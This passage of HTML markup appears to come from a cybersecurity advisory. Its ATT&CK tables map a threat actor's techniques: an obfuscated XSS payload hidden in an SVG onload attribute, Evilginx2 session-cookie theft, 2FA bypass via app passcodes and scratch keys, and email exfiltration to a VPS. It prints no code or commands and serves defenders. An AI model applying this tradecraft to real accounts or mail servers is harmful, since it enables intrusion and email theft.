&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Valid Accounts&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1078/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1078&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;This actor has used commercial datasets to acquire account credentials and gain unauthorized privileged access to accounts.&amp;nbsp;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;table15&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;TableContainer Ltr SCXW76044448 BCX8&quot;&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 15: Stealth&amp;nbsp;&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Obfuscated Files or Information: Command Obfuscation&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1027/010/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1027.010&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Obfuscated JavaScript payload sent to targets to exploit the XSS vulnerability.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Obfuscated Files or Information: Encrypted/Encoded File&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1027/013/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1027.013&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;The JavaScript payload included both a Base64-encoded and XOR-encrypted inner payload.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Obfuscated Files or Information: SVG Smuggling&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1027/017/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1027.017&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;The payload was contained in an “onload” attribute within an SVG image included in the malicious email.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Use Alternate Authentication Material: Web Session Cookie&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1550/004/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1550.004&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Previous campaigns using AiTM leveraged stealing and use of a victim’s session cookies to authenticate.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;TableContainer Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;table16&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 16: Credential Access&amp;nbsp;&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Modify Authentication Process: Multi-Factor Authentication&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1556/006/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1556.006&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Creating Application Passcodes to bypass 2FA and stealing a user’s “Scratch Keys,” which can be used in place of a 2FA token.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Adversary-in-the-Middle&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1557/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1557&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Previous campaigns used Evilginx2 as an AiTM toolkit to intercept credentials and session cookies.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;table17&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;TableContainer Ltr SCXW76044448 BCX8&quot;&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 17: Collection&amp;nbsp;&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Data Staged: Remote Data Staging&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1074/002/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1074.002&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Exfiltrated data was sent to an actor-controlled VPS prior to assumed long-term storage solutions.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Email Collection&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1114/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1114&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;This group has emphasized collection of emails.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Email Collection: Remote Email Collection&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1114/002/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1114.002&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Emails are collected via API calls to the ZCS mail server and are not collected from emails stored directly on the victim’s device.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Automated Collection&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1119/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1119&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Upon execution, the JavaScript payload automatically collects all relevant information in stages.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Browser Session Hijacking&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1185/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1185&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;The JavaScript payload leverages the user’s authenticated browser session to make API requests as the user.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Archive Collected Data&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1560/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1560&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Emails are exfiltrated with GZIP compression.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;TableContainer Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;table18&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 18: Discovery&amp;nbsp;&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Account Discovery&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1087/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1087&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Stolen Global Access Lists provide the group with new users to target.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;table19&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;TableContainer Ltr SCXW76044448 BCX8&quot;&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 19: Exfiltration&amp;nbsp;&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Exfiltration Over Alternative Protocol&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1048/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1048&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
